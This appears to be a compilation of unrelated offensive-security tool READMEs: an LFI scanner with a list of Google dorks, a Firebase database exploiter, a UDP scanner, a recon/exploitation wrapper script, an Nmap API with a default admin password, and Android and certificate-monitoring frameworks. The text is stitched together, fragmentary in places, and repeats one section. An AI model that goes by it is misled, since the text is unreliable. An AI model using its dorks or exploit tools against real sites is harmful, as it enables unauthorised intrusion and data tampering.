It is important to note that LFI Space is intended for responsible and authorized use, such as security testing, vulnerability assessments, or penetration testing, with proper consent and legal permissions. It is crucial to adhere to ethical guidelines and respect the privacy and security of targeted systems.
In conclusion, LFI Space is a powerful tool that combines Google Dork Search and Targeted URL Scan functionalities to detect Local File Inclusion vulnerabilities in web applications. By automating the search for potentially vulnerable pages and providing the ability to scan specific URLs, LFI Space empowers security professionals to identify LFI vulnerabilities effectively. With its user-friendly interface and comprehensive scanning capabilities, LFI Space is an invaluable asset for enhancing the security posture of web applications.
inurl:/filedown.php?file=
inurl:/news.php?include=
inurl:/view/lang/index.php?page=?page=
inurl:/shared/help.php?page=
inurl:/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
inurl:/squirrelcart/cart_content.php?cart_isp_root=
inurl:index2.php?to=
inurl:index.php?load=
inurl:home.php?pagina=
/surveys/survey.inc.php?path=
index.php?body=
/classes/adodbt/sql.php?classes_dir=
enc/content.php?Home_Path=
git clone https://github.com/capture0x/Lfi-Space/
cd Lfi-Space
pip3 install -r requirements.txt
python3 lfi.py
Contributions are welcome! If you find any issues or have suggestions for improvements, please open an issue or submit a pull request.
For bug reports or enhancements, please open an issue here.
Copyright 2023
Secure Your API.
With Metlo you can:
Metlo does this by scanning your API traffic using one of our connectors and then analyzing trace data.
There are three ways to get started with Metlo. Metlo Cloud, Metlo Self Hosted, and our Open Source product. We recommend Metlo Cloud for almost all users as it scales to 100s of millions of requests per month and all upgrades and migrations are managed for you.
You can get started with Melto Cloud right away without a credit card. Just make an account on https://app.metlo.com and follow the instructions in our docs here.
Although we highly recommend Metlo Cloud, if you're a large company or need an air-gapped system you can self host Metlo as well! Create an account on https://my.metlo.com and follow the instructions on our docs here to setup Metlo in your own Cloud environment.
If you want to deploy our Open Source product we have instructions for AWS, GCP, Azure and Docker.
You can also join our Discord community if you need help or just want to chat!
For tests that we can't autogenerate, our built in testing framework helps you get to 100% Security Coverage on your highest risk APIs. You can build tests in a yaml format to make sure your API is working as intendend.
For example the following test checks for broken authentication:
id: test-payment-processor-metlo.com-user-billing
meta:
name: test-payment-processor.metlo.com/user/billing Test Auth
severity: CRITICAL
tags:
- BROKEN_AUTHENTICATION
test:
- request:
method: POST
url: https://test-payment-processor.metlo.com/user/billing
headers:
- name: Content-Type
value: application/json
- name: Authorization
value: ...
data: |-
{ "ccn": "...", "cc_exp": "...", "cc_code": "..." }
assert:
- key: resp.status
value: 200
- request:
method: POST
url: https://test-payment-processor.metlo.com/user/billing
headers:
- name: Content-Type
value: application/json
data: |-
{ "ccn": "...", "cc_exp": "...", "cc_code": "..." }
assert:
- key: resp.s tatus
value: [ 401, 403 ]
You can see more information on our docs.
Most businesses have adopted public facing APIs to power their websites and apps. This has dramatically increased the attack surface for your business. Thereβs been a 200% increase in API security breaches in just the last year with the APIs of companies like Uber, Meta, Experian and Just Dial leaking millions of records. It's obvious that tools are needed to help security teams make APIs more secure but there's no great solution on the market.
Some solutions require you to go through sales calls to even try the product while others have you to send all your API traffic to their own cloud. Metlo is the first Open Source API security platform that you can self host, and get started for free right away!
We would love for you to come help us make Metlo better. Come join us at Metlo!
This repo is entirely MIT licensed. Features like user management, user roles and attack protection require an enterprise license. Contact us for more information.
Checkout our development guide for more info on how to develop Metlo locally.
exploit.json
to upload during exploitURI path
for exploitThis will display help for the CLI tool. Here are all the required arguments it supports.
FirebaseExploiter was built using go1.19. Make sure you use latest version of Go to install successfully. Run the following command to install the latest version:
go install -v github.com/securebinary/firebaseExploiter@latest
To scan a specific domain to check for Insecure Firebase DB.
To exploit a Firebase DB to write your own JSON document in it.
Create your own exploit.json
file in proper JSON format to exploit vulnerable Firebase DBs.
Checking the exploited URL to verify the vulnerability.
Adding custom path
for exploiting Firebase DBs.
Mass scanning for Insecure Firebase Databases from list of target hosts.
Exploiting vulnerable Firebase DBs from the list of target hosts.
FirebaseExploiter
is made with love by the SecureBinary
team. Any tweaks / community contribution are welcome.
Fast and lightweight, UDPX is a single-packet UDP scanner written in Go that supports the discovery of over 45 services with the ability to add custom ones. It is easy to use and portable, and can be run on Linux, Mac OS, and Windows. Unlike internet-wide scanners like zgrab2 and zmap, UDPX is designed for portability and ease of use.
Scanning UDP ports is very different than scanning TCP - you may, or may not get any result back from probing an UDP port as UDP is a connectionless protocol. UDPX implements a single-packet based approach. A protocol-specific packet is sent to the defined service (port) and waits for a response. The limit is set to 500 ms by default and can be changed by -w
flag. If the service sends a packet back within this time, it is certain that it is indeed listening on that port and is reported as open.
A typical technique is to send 0 byte UDP packets to each port on the target machine. If we receive an "ICMP Port Unreachable" message, then the port is closed. If an UDP response is received to the probe (unusual), the port is open. If we get no response at all, the state is open or filtered, meaning that the port is either open or packet filters are blocking the communication. This method is not implemented as there is no added value (UDPX tests only for specific protocols).
Concurrency: By default, concurrency is set to 32 connections only (so you don't crash anything). If you have a lot of hosts to scan, you can set it to 128 or 256 connections. Based on your hardware, connection stability, and ulimit (on *nix), you can run 512 or more concurrent connections, but this is not recommended.
To scan a single IP:
udpx -t 1.1.1.1
To scan a CIDR with maximum of 128 connections and timeout of 1000 ms:
udpx -t 1.2.3.4/24 -c 128 -w 1000
To scan targets from file with maximum of 128 connections for only specific service:
udpx -tf targets.txt -c 128 -s ipmi
Target can be:
IPv6 is supported.
If you want to store the results, use flag -o [filename]
. Output is in JSONL format, as can be seen bellow:
{"address":"45.33.32.156","hostname":"scanme.nmap.org","port":123,"service":"ntp","response_data":"JAME6QAAAEoAAA56LU9vp+d2ZPwOYIyDxU8jS3GxUvM="}
__ ______ ____ _ __
/ / / / __ \/ __ \ |/ /
/ / / / / / / /_/ / /
/ /_/ / /_/ / ____/ |
\____/_____/_/ /_/|_|
v1.0.2-beta, by @nullt3r
Usage of ./udpx-linux-amd64:
-c int
Maximum number of concurrent connections (default 32)
-nr
Do not randomize addresses
-o string
Output file to write results
-s string
Scan only for a specific service, one of: ard, bacnet, bacnet_rpm, chargen, citrix, coap, db, db, digi1, digi2, digi3, dns, ipmi, ldap, mdns, memcache, mssql, nat_port_mapping, natpmp, netbios, netis, ntp, ntp_monlist, openvpn, pca_nq, pca_st, pcanywhere, portmap, qotd, rdp, ripv, sentinel, sip, snmp1, snmp2, snmp3, ssdp, tftp, ubiquiti, ubiquiti_discovery_v1, ubiquiti_discovery_v2, upnp, valve, wdbrpc, wsd, wsd_malformed, xdmcp, kerberos, ike
-sp
Show received packets (only first 32 bytes)
-t string
IP/CIDR to scan
-tf string
File containing IPs/CIDRs to scan
-w int
Maximum time to wait for a response (socket timeout) in ms (default 500)
You can grab prebuilt binaries in the release section. If you want to build UDPX from source, follow these steps:
From git:
git clone https://github.com/nullt3r/udpx
cd udpx
go build ./cmd/udpx
You can find the binary in the current directory.
Or via go:
go install -v github.com/nullt3r/udpx/cmd/udpx@latest
After that, you can find the binary in $HOME/go/bin/udpx
. If you want, move binary to /usr/local/bin/
so you can call it directly.
The UDPX supports more then 45 services. The most interesting are:
The complete list of supported services:
Please send a feature request with protocol name and port and I will make it happen. Or add it on your own, the file pkg/probes/probes.go
contains all available payloads. Specify the protocol name, port and packet data (hex-encoded).
{
Name: "ike",
Payloads: []string{"5b5e64c03e99b51100000000000000000110020000000000000001500000013400000001000000010000012801010008030000240101"},
Port: []int{500, 4500},
},
I am not responsible for any damages. You are responsible for your own actions. Scanning or attacking targets without prior mutual consent can be illegal.
UDPX is distributed under MIT License.
How it works β’ Installation β’ Usage β’ MODES β’ For Developers β’ Credits
Introducing SCRIPTKIDDI3, a powerful recon and initial vulnerability detection tool for Bug Bounty Hunters. Built using a variety of open-source tools and a shell script, SCRIPTKIDDI3 allows you to quickly and efficiently run a scan on the target domain and identify potential vulnerabilities.
SCRIPTKIDDI3 begins by performing recon on the target system, collecting information such as subdomains, and running services with nuclei. It then uses this information to scan for known vulnerabilities and potential attack vectors, alerting you to any high-risk issues that may need to be addressed.
In addition, SCRIPTKIDDI3 also includes features for identifying misconfigurations and insecure default settings with nuclei templates, helping you ensure that your systems are properly configured and secure.
SCRIPTKIDDI3 is an essential tool for conducting thorough and effective recon and vulnerability assessments. Let's Find Bugs with SCRIPTKIDDI3
[Thanks ChatGPT for the Description]
This tool mainly performs 3 tasks
SCRIPTKIDDI3 requires different tools to run successfully. Run the following command to install the latest version with all requirments-
git clone https://github.com/thecyberneh/scriptkiddi3.git
cd scriptkiddi3
bash installer.sh
scriptkiddi3 -h
This will display help for the tool. Here are all the switches it supports.
[ABOUT:]
Streamline your recon and vulnerability detection process with SCRIPTKIDDI3,
A recon and initial vulnerability detection tool built using shell script and open source tools.
[Usage:]
scriptkiddi3 [MODE] [FLAGS]
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml
[MODES:]
['-m'/'--mode']
Available Options for MODE:
SUB | sub | SUBDOMAIN | subdomain Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
URL | url Run scriptkiddi3 in URL ENUMERATION mode
EXP | exp | EXPLOIT | exploit Run scriptkiddi3 in Full Exploitation mode
Feature of EXPLOI mode : subdomain enumaration, URL Enumeration,
Vulnerability Detection with Nuclei,
an d Scan for SUBDOMAINE TAKEOVER
[FLAGS:]
[TARGET:] -d, --domain target domain to scan
[CONFIG:] -c, --config path of your configuration file for subfinder
[HELP:] -h, --help to get help menu
[UPDATE:] -u, --update to update tool
[Examples:]
Run scriptkiddi3 in full Exploitation mode
scriptkiddi3 -m EXP -d target.com
Use your own CONFIG file for subfinder
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml
Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
scriptkiddi3 -m SUB -d target.com
Run scriptkiddi3 in URL ENUMERATION mode
scriptkiddi3 -m SUB -d target.com
Run SCRIPTKIDDI3 in FULL EXPLOITATION MODE
scriptkiddi3 -m EXP -d target.com
FULL EXPLOITATION MODE contains following functions
Run scriptkiddi3 in SUBDOMAIN ENUMERATION MODE
scriptkiddi3 -m SUB -d target.com
SUBDOMAIN ENUMERATION MODE contains following functions
Run scriptkiddi3 in URL ENUMERATION MODE
scriptkiddi3 -m URL -d target.com
URL ENUMERATION MODE contains following functions
Using your own CONFIG File for subfinder
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml
You can also provie your own CONDIF file with your API Keys for subdomain enumeration with subfinder
Updating tool to latest version You can run following command to update tool
scriptkiddi3 -u
An Example of config.yaml
binaryedge:
- 0bf8919b-aab9-42e4-9574-d3b639324597
- ac244e2f-b635-4581-878a-33f4e79a2c13
censys:
- ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
certspotter: []
passivetotal:
- sample-email@user.com:sample_password
securitytrails: []
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
github:
- ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
- ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
zoomeye:
- zoomeye_username:zoomeye_password
If you have ideas for new functionality or modes that you would like to see in this tool, you can always submit a pull request (PR) to contribute your changes.
If you have any other queries, you can always contact me on Twitter(thecyberneh)
I would like to express my gratitude to all of the open source projects that have made this tool possible and have made recon tasks easier to accomplish.
Uses python3.10, Debian, python-Nmap, and flask framework to create a Nmap API that can do scans with a good speed online and is easy to deploy.
This is a implementation for our college PCL project which is still under development and constantly updating.
GET /api/p1/{username}:{password}/{target}
GET /api/p2/{username}:{password}/{target}
GET /api/p3/{username}:{password}/{target}
GET /api/p4/{username}:{password}/{target}
GET /api/p5/{username}:{password}/{target}
Parameter | Type | Description |
---|---|---|
username | string | Required. username of the current user |
password | string | Required. current user password |
target | string | Required. The target Hostname and IP |
GET /api/p1/
GET /api/p2/
GET /api/p3/
GET /api/p4/
GET /api/p5/
Parameter | Return data | Description | Nmap Command |
---|---|---|---|
p1 | json | Effective Scan | -Pn -sV -T4 -O -F |
p2 | json | Simple Scan | -Pn -T4 -A -v |
p3 | json | Low Power Scan | -Pn -sS -sU -T4 -A -v |
p4 | json | Partial Intense Scan | -Pn -p- -T4 -A -v |
p5 | json | Complete Intense Scan | -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln |
POST /adduser/{admin-username}:{admin-passwd}/{id}/{username}/{passwd}
POST /deluser/{admin-username}:{admin-passwd}/{t-username}/{t-userpass}
POST /altusername/{admin-username}:{admin-passwd}/{t-user-id}/{new-t-username}
POST /altuserid/{admin-username}:{admin-passwd}/{new-t-user-id}/{t-username}
POST /altpassword/{admin-username}:{admin-passwd}/{t-username}/{new-t-userpass}
Parameter | Type | Description |
---|---|---|
admin-username | String | Admin username |
admin-passwd | String | Admin password |
id | String | Id for newly added user |
username | String | Username of the newly added user |
passwd | String | Password of the newly added user |
t-username | String | Target username |
t-user-id | String | Target userID |
t-userpass | String | Target users password |
new-t-username | String | New username for the target |
new-t-user-id | String | New userID for the target |
new-t-userpass | String | New password for the target |
DEFAULT CREDENTIALS
ADMINISTRATOR : zAp6_oO~t428)@,
The security of mobile devices has become a critical concern due to the increasing amount of sensitive data being stored on them. With the rise of Android OS as the most popular mobile platform, the need for effective tools to assess its security has also increased. In response to this need, a new Android framework has emerged that combines three powerful tools - AndroPass, APKUtil, RMS, and MobFS - to conduct comprehensive vulnerability analysis of Android applications. This framework is known as QuadraInspect.
QuadraInspect is an Android framework that integrates AndroPass, APKUtil, RMS and MobFS, providing a powerful tool for analyzing the security of Android applications. AndroPass is a tool that focuses on analyzing the security of Android applications' authentication and authorization mechanisms, while APKUtil is a tool that extracts valuable information from an APK file. Lastly, MobFS and RMS facilitates the analysis of an application's filesystem by mounting its storage in a virtual environment.
By combining these three tools, QuadraInspect provides a comprehensive approach to vulnerability analysis of Android applications. This framework can be used by developers, security researchers, and penetration testers to assess the security of their own or third-party applications. QuadraInspect provides a unified interface for all three tools, making it easier to use and reducing the time required to conduct comprehensive vulnerability analysis. Ultimately, this framework aims to increase the security of Android applications and protect users' sensitive data from potential threats.
To install the tools you need to: First : git clone https://github.com/morpheuslord/QuadraInspect
Second Open a Administrative cmd or powershell (for Mobfs setup) and run : pip install -r requirements.txt && python3 main.py
Third : Once QuadraInspect loads run this command QuadraInspect Main>> : START install_tools
The tools will be downloaded to the tools
directory and also the setup.py and setup.bat commands will run automatically for the complete installation.
Each module has a help function so that the commands and the discriptions are detailed and can be altered for operation.
These are the key points that must be addressed for smooth working:
args
or using SET target
withing the tool.target
folder as all the tool searches for the target file with that folder.There are 2 modes:
|
ββ> F mode
ββ> A mode
The f
mode is a mode where you get the active interface for using the interactive vaerion of the framework with the prompt, etc.
F mode is the normal mode and can be used easily
A mode or argumentative mode takes the input via arguments and runs the commands without any intervention by the user this is limited to the main menu in the future i am planning to extend this feature to even the encorporated codes.
python main.py --target <APK_file> --mode a --command install_tools/tools_name/apkleaks/mobfs/rms/apkleaks
the main menu of the entire tool has these options and commands:
Command | Discription |
---|---|
SET target | SET the name of the targetfile |
START install_tools | If not installed this will install the tools |
LIST tools_name | List out the Tools Intigrated |
START apkleaks | Use APKLeaks tool |
START mobfs | Use MOBfs for dynamic and static analysis |
START andropass | Use AndroPass APK analizer |
help | Display help menu |
SHOW banner | Display banner |
quit | Quit the program |
As mentioned above the target must be set before any tool is used.
The APKLeaks menu is also really straight forward and only a few things to consider:
SET output
and SET json-out
takes file names not the actual files it creates an output in the result
directory.SET pattern
option takes a name of a json pattern file. The JSON file must be located in the pattern
directoryOPTION | SET Value |
---|---|
SET output | Output for the scan data file name |
SET arguments | Additional Disassembly arguments |
SET json-out | JSON output file name |
SET pattern | The pre-searching pattern for secrets |
help | Displays help menu |
return | Return to main menu |
quit | Quit the tool |
Mobfs is pritty straight forward only the port number must be taken care of which is by default on port 5000 you just need to start the program and connect to it on 127.0.0.1:5000
over your browser.
AndroPass is also really straight forward it just takes the file as input and does its job without any other inputs.
The APK analysis framework will follow a modular architecture, similar to Metasploit. It will consist of the following modules:
Currentluy there only 3 but if wanted people can add more tools to this these are the things to be considered:
config/installer.py
config/mobfs.py , config/androp.py, config/apkleaks.py
If wanted you could do your upgrades and add it to this repository for more people to use kind of growing this tool.
CertWatcher is a tool for capturing and tracking certificate transparency logs, using YAML templates. The tool helps detect and analyze websites using regular expression patterns and is designed for ease of use by security professionals and researchers.
Certwatcher continuously monitors the certificate data stream and checks for patterns or malicious activity. Certwatcher can also be customized to detect specific phishing, exposed tokens, secret api key patterns using regular expressions defined by YAML templates.
Certwatcher allows you to use custom templates to display the certificate information. We have some public custom templates available from the community. You can find them in our repository.
If you want to contribute to this project, follow the steps below:
CertWatcher is a tool for capture and tracking certificate transparency logs, using YAML templates. The tool helps to detect and analyze phishing websites and regular expression patterns, and is designed to make it easy to use for security professionals and researchers.
Certwatcher continuously monitors the certificate data stream and checks for suspicious patterns or malicious activity. Certwatcher can also be customized to detect specific phishing patterns and combat the spread of malicious websites.
Certwatcher allows you to use custom templates to display the certificate information. We have some public custom templates available from the community. You can find them in our repository.
If you want to contribute to this project, follow the steps below: